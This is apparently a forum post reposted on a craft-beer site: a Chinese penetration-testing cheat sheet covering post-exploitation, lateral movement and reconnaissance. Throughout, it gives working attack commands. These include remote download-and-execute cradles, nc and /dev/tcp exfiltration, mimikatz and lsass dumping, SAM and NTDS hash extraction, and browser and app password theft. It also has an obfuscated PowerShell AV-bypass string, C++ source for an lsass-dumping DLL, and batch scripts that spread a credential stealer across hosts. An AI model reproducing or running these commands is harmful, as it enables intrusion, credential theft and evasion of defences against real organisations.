请选择 进入手机版 | 继续访问电脑版
游客您好
第三方账号登陆
  • 点击联系客服

    在线时间:9:00-16:30

    客服微信

    318989567

    电子邮件

    admin@chnbeer.com
  • 汽泡菌APP

    发现更多好精酿

  • 扫描二维码

    关注汽泡菌APP公众号

推荐阅读
全球精酿视野 LV.1
未知星球 | 未知职业
  • 关注0
  • 粉丝0
  • 帖子13
精选帖子
开启左侧

渗透测试常规操作记录(下)

[复制链接]
全球精酿视野 发表于 2020-10-8 22:00:20 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
【精酿爱好者群】加微信拉你进群 318989567

马上注册,进入精酿啤酒的世界。APP下载请搜索:汽泡菌

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

Linux

操作系统&内核版本&环境变量>cat /etc/issue>cat /etc/*-release>cat /etc/lsb-release>cat /etc/redhat-releasecat /proc/version>uname -a>uname -mrs>rpm -q kernel>dmesg | grep Linux>ls /boot | grep vmlinuz->cat /etc/profile>cat /etc/bashrc>cat ~/.bash_profile>cat ~/.bashrc>cat ~/.bash_logout>env>setRoot权限进程>ps aux | grep root>ps -ef | grep root计划任务>crontab -l>ls -alh /var/spool/cron>ls -al /etc/ | grep cron>ls -al /etc/cron*>cat /etc/cron*>cat /etc/at.allow>cat /etc/at.deny>cat /etc/cron.allow>cat /etc/cron.deny>cat /etc/crontab>cat /etc/anacrontab>cat /var/spool/cron/crontabs/rootIP信息>/sbin/ifconfig -a>cat /etc/network/interfaces>cat /etc/sysconfig/network连接信息>grep 80 /etc/services>netstat -antup>netstat -antpx>netstat -tulpn>chkconfig --list>chkconfig --list | grep 3:on>last>w用户信息>id>whomi>w>last>cat /etc/passwd>cat /etc/group>cat /etc/shadow>ls -alh /var/mail/>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # 列出超级用户>awk -F: '($3 == "0") {print}' /etc/passwd   #列出超级用户>cat /etc/sudoers>sudo –l操作记录>cat ~/.bash_history>cat ~/.nano_history>cat ~/.atftp_history>cat ~/.mysql_history>cat ~/.php_history可写目录>find / -writable -type d 2>/dev/null      # 可写目录>find / -perm -222 -type d 2>/dev/null     # 可写目录 >find / -perm -o w -type d 2>/dev/null     # 可写目录>find / -perm -o x -type d 2>/dev/null     # 可执行目录>find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # 可写可执行目录
HTTP服务
>python2 -m SimpleHTTPServer >python3 -m http.server 8080>php -S 0.0.0.0:8888>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes>openssl s_server -key key.pem -cert cert.pem -accept 443 –WWW>ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888,:DocumentRoot => Dir.pwd).start">ruby -run -e httpd . -p 8888
文件操作

Windows查找文件

>cd /d E: && dir /b /s index.php>for /r E:\ %i in (index*.php) do @echo %i>powershell Get-ChildItem d:\ -Include index.php -recurse

Linux查找文件

#find / -name index.php查找木马文件>find . -name '*.php' | xargs grep -n 'eval('>find . -name '*.php' | xargs grep -n 'assert('>find . -name '*.php' | xargs grep -n 'system('

创建

读文本文件:>file = Get-Content "1.txt">file>powershell Set-content "1.txt" "wocao"&>powershell "write-output ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(\"d2Vic2hlbGw=\"))) | out-file -filepath c:\www\wwwroot\1.aspx;"



压缩
>rar.exe a –k –r –s –m3 C:\1.rar C:\wwwroot>7z.exe a –r –p12345 C:\1.7z C:\wwwroot


解压

>rar.exe e c:\wwwroot\1.rar>7z.exe x –p12345 C:\1.7z –oC:\wwwroot


传输


FTP

>open 192.168.0.98 21>输入账号密码>dir查看文件>get file.txt



VBS

#1.vbsSet Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Open "GET","http://192.168.1.192/Client.exe",0Post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()aGet.Write(Post.responseBody)aGet.SaveToFile "C:\1.exe",2 >cscript 1.vbsConst adTypeBinary = 1Const adSaveCreateOverWrite = 2Dim http,adoSet http = CreateObject("Msxml2.serverXMLHTTP")http.SetOption 2,13056//忽略HTTPS错误http.open "GET","http://192.168.1.192/Client.exe",Falsehttp.sendSet ado = createobject("Adodb.Stream")ado.Type = adTypeBinaryado.Openado.Write http.responseBodyado.SaveToFile "c:\1.exe"ado.Close



JS
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();BinStream = new ActiveXObject("ADODB.Stream");BinStream.Type = 1; BinStream.Open();BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("1.exe");>cscript /nologo 1.js http://192.168.1.192/Client.exe



Bitsadmin

>bitsadmin /transfer n http://192.168.1.192/Client.exe  e:\1.exe>bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe>bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe "


Powershell
1
注意:内核5.2以下版本可能无效
>powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/Client.exe','C:\1.exe'); start-process 'c:\1.exe'>powershell>(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/1.exe',"$env:APPDATA\csrsv.exe");Start-Process("$env:APPDATA\csrsv.exe")


2
PS>Copy-Item '\\sub2k8.zone.com\c$\windows\1.txt' -Destination '\\dc.zone.com\c$\1.txt'


3
>powershell ($dpl=$env:temp+'f.exe');(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/ok.txt',$dpl);


4
高版本
PS>iwr -Uri http://192.168.0.106:1222/111.txt -OutFile 123.txt –UseBasicParsing


5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates>Import-Module BitsTransfer>$path = [environment]::getfolderpath("temp")>Start-BitsTransfer -Source "http://192.168.0.108/ok.txt" -Destination "$path\ok.txt">Invoke-Item  "$path\ok.txt"


Certutil
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete对文件进行编码下载后解码执行>base64 payload.exe > /var/www/html/1.txt # 在C&C上生成经base64编码的exe>certutril -urlcache -split -f http://192.168.0.107/1.txt & certurl -decode 1.txt ms.exe & ms.exe


Python
#python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'


Perl

#!/usr/bin/perluse LWP::Simple;getstore("http://192.168.1.192/Client.exe", "1.exe");

PHP

#!/usr/bin/php<?php $data = @file("http://192.168.1.192/Client.exe");$lf = "1.exe";$fh = fopen($lf, 'w');fwrite($fh, $data[0]);fclose($fh);?>
Curl
#curl -o 1.exe http://192.168.1.192/Client.exe


wget

#wget http://192.168.1.192/Client.exe#wget –b后台下载#wget –c 中断恢复


nc
>nc –lvnp 333 >1.txt目标机>nc –vn 192.168.1.2 333 <test.txt –q 1&>cat 1.txt >/dev/tcp/1.1.1.1/333


SCP

Linux中传输文件>scp -P 22 file.txt user@1.1.1.1:/tmp


Hash&密码

破解网址

https://www.objectif-securite.ch/en/ophcrackhttp://cracker.offensive-security.com/index.phpGoogleColab破解hash之前在freebuf上看到过相关文章,最近在github上也看到了这个脚本,所以拿起来试试,速度可观https://www.freebuf.com/geek/195453.htmlhttps://gist.github.com/chvancooten/59acfbf1d8ee7a865108fca2e9d04c4a打开https://drive.google.com/drive新建一个文件夹,右键,更多选择google Colab


如果没有,点关联更多应用,搜索这个名字,安装一下即可


安装hashcat,下载字典


运行类型选择GPU加速


这里测试个简单密码


12亿条密码大概20多分钟
https://download.weakpass.com/wordlists/1851/hashesorg2019.gz
以上是字典

密码策略

默认情况,主机账号的口令每30天变更一次
>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Netlogon\Parameters,键值为DisablePasswordChange,设置为1,即表示禁止修改账号口令>组策略(gpedit.msc)中修改默认的30天,修改位置为"Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Maximum machine account password age"设置为0时,表示无限长>禁止修改主机账号口令,用来支持VDI (virtual desktops)等类型的使用,具体位置为"Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Disable machine account password changes"Debug Privilege本地安全策略>本地策略>用户权限分配>调试程序

开启Wdigest

Cmd>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /fpowershell>Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1meterpreter>reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 1Getpass>getpassword.exe>1.txtQuarksPwDump>QuarksPwDump.exe -dump-hash-localMSFMeterpreter > run hashdump&Meterpreter > mimikatz_command -f samdump::hashes&Meterpreter > load mimikatzMeterpreter > wdigest&Meterpreter > load mimikatzMeterpreter > msvMeterpreter > kerberos&Meterpreter > load kiwiMeterpreter > creds_all&Meterpreter > migrate PIDMeterpreter > load mimikatzMeterpreter > mimikatz_command -f sekurlsa::searchPasswords&Meterpreter > run windows/gather/smart_hashdumpEmpire>usemodule credentials/mimikatz/dcsync_hashdumpInvoke-Dcsync>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-DCSync.ps1');invoke-dcsync


Mimikatz

调用mimikatz远程抓取

抓明文>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/nishang/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz抓hash>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.100/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes>powershell -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz" >C:\Users\Administrator.DC\Desktop\1123.txt
横向批量抓hash
Schtasks
把IP列表放入ip.txt文件中,通过一个账户密码批量net use与列表里的IP建立连接,如果建立连接没出错的话,复制getpass到目录temp目录,使用账户密码远程创建计划任务名字为windowsupdate,指定每日00:00以system权限执行getpass文件,创建完计划任务后,/tn是立刻执行此计划任务,执行完后删除此计划任务,ping -n 10>nul是程序停留,相当于延时10秒,之后复制文件到本地,接着删除getpass文件,删除创建的连接。>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & schtasks /create /s "%i" /u "administrator" /p "password" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\getpass.exe" /sc DAILY /mo 1 /ST 00:00 /RU SYSTEM & schtasks /run /tn windowsupdate /s "%i" /U "administrator" /P "password" & schtasks /delete /F /tn windowsupdate /s "%i" /U " administrator" /P "password" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\debug\getpass.exe /F & net use \\%i\admin$ /del
Wmic
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\getpass.exe" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\temp\getpass.exe /F & net use \\%i\admin$ /del
直接使用
>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt>privilege::debug>misc::memssp
锁屏
>rundll32.exe user32.dll,LockWorkStation记录的结果在c:\windows\system32\mimilsa.log>mimikatz log "privilege::debug" "lsadump::lsa /patch">mimikatz !privilege::debug>mimikatz !token::elevate>mimikatz !lsadump::sam

Powershell Bypass

>powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
.net 2.0
katz.cs放置C:\Windows\Microsoft.NET\Framework\v2.0.50727Powershell执行>$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='>$Content = [System.Convert]::FromBase64String($key)>Set-Content key.snk -Value $Content –Encoding ByteCmd执行>C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs>C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
.net 4.0 Msbuild
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild mimi.xml


JScript

>wmic os get /format:"mimikatz.xsl"

>wmic os get /format:"http://192.168.0.107/ps/mimi.xsl"
Procdump64+mimikatz
>procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp>procdump.exe -accepteula -ma lsass.exe lsass.dmp>mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TheKingOfDuck/hashdump/master/procdump/procdump.ps1');Invoke-Procdump64 -Args '-accepteula -ma lsass.exe lsass.dmp'"
Dumpert
https://github.com/outflanknl/Dumpert有三种,分别是dll,可执行文件和cs的Aggressor插件,这里测试下dll和exeDLL的执行方式是rundll32.exe C:\Outflank-Dumpert.dll,Dump

文件保存在c:\windows\temp\dumpert.dmp用mimikatz>sekurlsa::mimidump c:\windows\temp\dumpert.dmp>sekurlsa::logonpasswords

可执行文件就直接执行就可以了

绕过卡巴斯基

https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e

将三个文件下载到本地,使用visual studio进行编译,需要修改了几个地方。(1)添加如下代码#pragma comment(lib, "Rpcrt4.lib") (引入Rpcrt4.lib库文件)(2)将.c文件后缀改成.cpp (使用了c++代码,需要更改后缀)(3) 编译时选择x64编译得到exe文件Visual studio创建c++空项目配置类型选dll字符集选Unicode,调试器选64位Dll保存在C:\\windows\\temp\\1.bin

#include <cstdio>#include <windows.h>#include <DbgHelp.h>#include <iostream>#include <string>  #include <map>  #include <TlHelp32.h> 
#pragma comment(lib,"Dbghelp.lib")using namespace std;
int FindPID(){ PROCESSENTRY32 pe32; pe32.dwSize = sizeof(pe32);
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) { cout << "CreateToolhelp32Snapshot Error!" << endl;; return false; }
BOOL bResult = Process32First(hProcessSnap, &pe32);
while (bResult) { if (_wcsicmp(pe32.szExeFile, L"lsass.exe") == 0) { return pe32.th32ProcessID; } bResult = Process32Next(hProcessSnap, &pe32); }
CloseHandle(hProcessSnap);
return -1;}
typedef HRESULT(WINAPI* _MiniDumpW)( DWORD arg1, DWORD arg2, PWCHAR cmdline);
typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)( ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG Enabled);
int dump() {
HRESULT hr; _MiniDumpW MiniDumpW; _RtlAdjustPrivilege RtlAdjustPrivilege; ULONG t;
MiniDumpW = (_MiniDumpW)GetProcAddress( LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress( GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
if (MiniDumpW == NULL) {
return 0; } // try enable debug privilege RtlAdjustPrivilege(20, TRUE, FALSE, &t);
wchar_t ws[100]; swprintf(ws, 100, L"%hd%hs", FindPID(), " C:\\windows\\temp\\1.bin full");
MiniDumpW(0, 0, ws); return 0;
}BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: dump(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}>xxx.exe c:\xx\xx\xx.dll使用绝对路径

远程LSASS进程转储-Physmem2profit

https://github.com/FSecureLABS/physmem2profitmimikatz被多数安全人员用来获取凭据,但现在的AV/EDR很轻易的识别并查杀,这里不在服务器端使用mimikatz,远程对lsass进程进行转储。服务器端直接使用visual studio构建physmem2profit-public\server\

客户端>git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git客户端这里先安装>bash physmem2profit/client/install.sh

需要将此文件https://github.com/Velocidex/c-aff4/raw/master/tools/pmem/resources/winpmem/att_winpmem_64.sys传到目标服务器,我这里存放在c:\windows\temp\中服务器端执行>Physmem2profit.exe --ip 192.168.0.98 --port 8888 –verbose这里的IP是服务器端IP

攻击端安装所需模块

攻击端执行>source physmem2profit/client/.env/bin/activate>cd physmem2profit/client>python3 physmem2profit --mode all --host 192.168.0.98 --port 8888 --drive winpmem --install 'c:\windows\temp\att_winpmem_64.sys' --label test

服务器端可以看到

把生成的dmp文件转移到win系统上使用mimikatz即可获得hash,当然也可以在linux上使用pypykatz。


再来一条转储lsass进程的命令要以system权限执行>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pidlsass.dmp full


SqlDumper+mimikatz

位置C:\Program Files\Microsoft SQL Server\number\Shared>tasklist /svc | findstr lsass.exe  查看lsass.exe 的PID号>Sqldumper.exe ProcessID PID 0x01100  导出mdmp文件>mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
Mimipenguin
抓取linux下hash,root权限
https://github.com/huntergregal/mimipenguin


缓存hash提取

注册表

>reg save hklm\sam c:\sam.hive &reg save hklm\system c:\system.hive &reg save hklm\security c:\security.hive>mimikatz.exe "lsadump::sam /system:sys.hive /sam:sam.hive" exit

Ninjacopy

#http://192.168.0.101/powersploit/Exfiltration/Invoke-NinjaCopy.ps1>powershell -exec bypass>Import-Module .\invoke-ninjacopy.ps1>Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive>Invoke-NinjaCopy –Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit">Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -ComputerName "dc.zone.com" -LocalDestination "C:\Windows\Temp\1.dit"


Quarks-pwdump

>quarks-pwdump.exe –dump-hash-domain

域hash提取

Ntdsutil

>ntdsutil>snapshot>activate instance ntds>create>mount {guid}>copy 装载点\windows\NTDS\ntds.dit d:\ntds_save.dit>unmount {guid}>delete {guid}>quit&创建> ntdsutil snapshot “activate instance ntds” create quit quit挂载> ntdsutil snapshot “mount {guid}” quit quit复制>copy c:\$SNAP_XXX_VOLUMEC$\windows\NTDS\ntds.dit d:\ntds_save.dit卸载并删除> ntdsutil snapshot “unmounts {guid}” “delete {guid}” quit quit删除后检测> ntdsutil snapshot “List All” quit quit提取hash> QuarksPwDump -dump-hash-domain -ntds-file d:\ntds_save.dit

Vssadmin

创建C盘卷影拷贝>vssadmin create shadow /for=c:复制ntds.dit>copy {Shadow Copy Volume Name}\windows\NTDS\ntds.dit c:\ntds.dit删除拷贝>vssadmin delete shadows /for=c: /quiet
Impacket
Impacket中的secretsdump.py#impacket-secretsdump –system SYSTEM –ntds.dit LOCAL#impacket-secretsdump –hashs xxx:xxx –just-dc xxx.com/admin\@192.168.1.1

NTDSDumpex

>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit">reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.hivehttps://github.com/zcgonvh/NTDSDumpEx>NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

WMI调用Vssadmin

>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c vssadmin create shadow /for=C: 2>&1">wmic /node:dc /user:P xxxx\admin /password: passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1">wmic /node:dc /user: xxxx\admin /password: passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1">copy \\10.0.0.1\c$\temp\ntds.dit C:\tempPS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

PowerSploit

PS >Import-Module .\VolumeShadowCopyTools.ps1PS >New-VolumeShadowCopy -Volume C:\PS >Get-VolumeShadowCopy

Nishang

PS >Import-Module .\Copy-VSS.ps1PS >Copy-VSSPS >Copy-VSS -DestinationDir C:\ShadowCopy\或MSF中Meterpreter>load powershellMeterpreter>powershell_import /root/Copy-VSS.ps1Meterpreter>powershell_execute Copy-VSS

Mimikatz

#lsadump::dcsync /domain:xxx.com /all /csv#privilege::debug#lsadump::lsa /inject

MSF

#use auxiliary/admin/smb/psexec_ntdsgrab#set rhost smbdomain smbuser smbpass#exploitNtds.dit文件存在/root/.msf4/loot后渗透模块#use windows/gather/credentials/domain_hashdump#set session 1

laZagne

windows

https://github.com/AlessandroZ/LaZagne>laZagne.exe all -oN获取所有密码输出到文件PowershellPS>[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]PS>$vault = New-Object Windows.Security.Credentials.PasswordVaultPS>$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Linux

>python3 laZagne.py all

敏感信息

Seatbelt

使用Visual studio编译>Seatbelt.exe ALL获取所有信息

VNC密码

>reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v passwordhttp://www.cqure.net/wp/tools/password-recovery/vncpwdump/

解密

>vncpwdump.exe -k hash 

Navicat信息

>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host >reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName >reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd离线破解https://github.com/HyperSine/how-does-navicat-encrypt-password

Chrome保存的密码

>mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

Foxmail

X:\Foxmail\storage\xxx\Accounts\Account.rec0使用Foxmail Password Decryptor解密https://securityxploded.com/foxmail-password-decryptor.php

firefox保存的密码

https://www.nirsoft.net/password_recovery_tools.html>webbrowserpassview.exe /LoadPasswordsFirefox 1 /shtml "c:\1.html">dir %appdata%\Mozilla\Firefox\Profiles\>dir %appdata%\Mozilla\Firefox\Profiles\yn80ouvt.default需先结束firefox.exe进程压缩>7z.exe -r -padmin123 a c:\users\public\firefox.7z C:\Users\Administrator\AppData\Roaming\Mozilla\*.* https://github.com/unode/firefox_decrypthttps://securityxploded.com/firefox-master-password-cracker.php

SecureCRT
C:\Documents and Settings\Administrator\Application Data\VanDyke下的config文件夹C:\program files\Vandyke software\securecrt\https://github.com/uknowsec/SharpDecryptPwd

横向

探测存活主机

For+Ping命令查询存活主机>for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.0.%I |findstr "TTL="


For+Ping命令查询域名对应IP

>for /f "delims=" %i in (D:/domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"[192." >> c:/windows/temp/ds.txt

NbtScan

Windows>nbtscan.exe -m 192.168.1.0/24Linux#nbtscan -r 192.168.0.0/24

NMAP

#nmap -Pn -open -A -n -v -iL filename.txt-Pn:跳过主机发现-n:不做DNS解析-open:只显示开启的端口-A:扫描过程中,输入回车,可以查看扫描进度-v:显示详细信息-F:快速扫描100个常见端口-p:选择要扫描的端口  例:-p1-65535 (全端口扫描,中间没有空格)-iL:为程序指定一个要扫描的IP列表-sV:探测开放端口的服务和版本信息-T可以选择扫描等级,默认T3,但想快点话,可以输入  -T4存活主机>nmap -sP -PI 192.168.0.0/24>nmap -sn -PE -T4 192.168.0.0/24>nmap -sn -PR 192.168.0.0/24

代理nmap扫描
meterpreter > backgroundmsf > use auxiliary/server/socks4a再配置proxychains.conf#proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 内网IP

NetDiscover

#netdiscover -r 192.168.0.0/24 -i wlan0
rp-scan

kali>arp-scan --interface=wlan0 -localnetWindows>arp-scan.exe -t 192.168.0.0/24

MSF

#use auxiliary/scanner/discovery/arp_sweep


#use auxiliary/scanner/discovery/udp_sweep

#use auxiliary/scanner/netbios/nbnamemeterpreter>run post/windows/gather/arp_scanner RHOSTS=192.168.1.1/24meterpreter>run post/multi/gather/ping_sweep RHOSTS=192.168.1.1/24

探测服务&端口

常见端口
服务端口
Mssql1433
SMB445
WMI135
winrm5985
rdp3389
ssh22
oracle1521
mysql3306
redis6379
postgresql5432
ldap389
smtp25
pop3110
imap143
exchange443
vnc5900
ftp21
rsync873
mongodb27017
telnet23
svn3690
java rmi1099
couchdb5984
pcanywhere5632
web80-90,8000-10000,7001,9200,9300

Powershell

Powersploit
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powersploit/Recon/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts 192.168.0.0/24 –T 4 -Ports '1-65535' -oA C:\TEMP.txt"
Nishang
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/nishang/Scan/Invoke-PortScan.ps1'); Invoke-Portscan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort"

去掉scanport就是探测存活

SMB

https://github.com/ShawnDEvans/smbmap
MSF
#use auxiliary/scanner/smb/smb_version查询开启139,445端口主机#use auxiliary/scanner/smb/smb_login 爆破
NMAP
#nmap -sU -sS --script smb-enum-shares.nse -p 445 192.168. 1.119
CMD
>for /l %a in (1,1,254) do start /min /low telnet 192.168.1.%a 445

Linux Samba服务

端口一般139,弱口令连接>smbclient -L 192.168.0.110>smbclient '\\192.168.0.110\IPC$'#use exploit/linux/samba/is_known_pipenamea

MSF

端口
#use auxiliary/scanner/portscan/tcp#use auxiliary/scanner/portscan/ack
服务
#use auxiliary/scanner/ftp/ftp_version 开启FTP的机器#use auxiliary/scanner/ftp/anonymous 允许匿名登录的FTP#use auxiliary/scanner/ftp/ftp_login FTP爆破#use auxiliary/scanner/http/http_version 开启HTTP服务的#use auxiliary/scanner/smb/smb_version 开启SMB服务的#use auxiliary/scanner/smb/smb_enumshares 允许匿名登录的SMB#use auxiliary/scanner/smb/smb_login SMB爆破#use auxiliary/scanner/ssh/ssh_version 开启SSH的机器#use auxiliary/scanner/ssh/ssh_login SSH爆破#use auxiliary/scanner/telnet/telnet_version 开启TELNET服务的#use auxiliary/scanner/telnet/telnet_login TELNET爆破#use auxiliary/scanner/mysql/mysql_version 开启MYSQL服务的#use auxiliary/scanner/mysql/mysql_login MYSQL爆破#use auxiliary/scanner/mssql/mssql_ping 开启SQLSERVER服务的#use auxiliary/scanner/mssql/mssql_login MSSQL爆破#use auxiliary/scanner/postgres/postgres_version开启POSTGRE服务的#use auxiliary/scanner/postgres/postgres_login POSTGRESQL爆破#use auxiliary/scanner/oracle/tnslsnr_version 开启oracle数据库的#use auxiliary/admin/oracle/oracle_login Oracle数据库爆破#use auxiliary/scanner/http/title 扫描HTTP标题#use auxiliary/scanner/rdp/rdp_scanner 开启RDP服务的#use auxiliary/scanner/http/webdav_scanner#use auxiliary/scanner/http/http_put 开启WEBDAV的#use auxiliary/scanner/smb/smb_ms17_010 存在17010漏洞的#use auxiliary/scanner/http/zabbix_login zabbix爆破#use auxiliary/scanner/http/axis_login axis爆破#use auxiliary/scanner/redis/redis_login redis爆破

Nc

>nc -znv 192.168.0.98 1-65535


>nc -v -w 1 192.168.0.110 -z 1-1000>for i in {101..102}; do nc -vv -n -w 1 192.168.0.$i 21-25 -z; done

Masscan

